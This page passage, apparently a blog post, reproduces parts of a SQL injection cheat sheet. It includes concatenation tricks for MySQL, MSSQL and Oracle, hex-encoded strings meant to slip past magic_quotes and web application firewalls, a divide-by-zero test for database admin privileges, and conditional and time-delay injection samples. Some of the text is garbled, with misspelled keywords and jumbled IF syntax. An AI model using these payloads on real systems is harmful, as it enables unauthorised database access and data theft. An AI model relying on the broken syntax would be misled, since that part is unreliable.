![]() SELECT CONCAT(login, password) FROM members A better way to do it is using CONCAT()function in MySQL. If MySQL is running in ANSI mode it’s going to work but otherwise MySQL accept it as `logical operator` it’ll return 0. SELECT login || '-' || password FROM members SELECT login + '-' + password FROM members These can be quite useful to build up injections which are not using any quotes, bypass any other black listing or determine back end database. SELECT 0x50 + 0x45 ( this is integer now!) (M) SELECT 0x5045 ( this is not an integer it will be a string from Hex) (M) Very useful for bypassing, magic_quotes() and similar filters, or even WAFs. This will throw an divide by zero error if current logged user is not “sa” or “dbo”. If ((select user) = 'sa' OR (select user) = 'dbo') select 1 else select 1/0 (S) If Statement SQL Injection Attack Samples SELECT CASE WEHEN (1=1) THEN 'A' ELSE 'B'END SELECT CASE WHEN condition THEN true-part ELSE false-part END (P).IF (1=1) THEN dbms_lock.sleep(3) ELSE dbms_lock.sleep(0) END IF END IF condition THEN true-part ELSE false-part END IF END (O) IF (1=1) SELECT 'true' ELSE SELECT 'false' ![]()
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |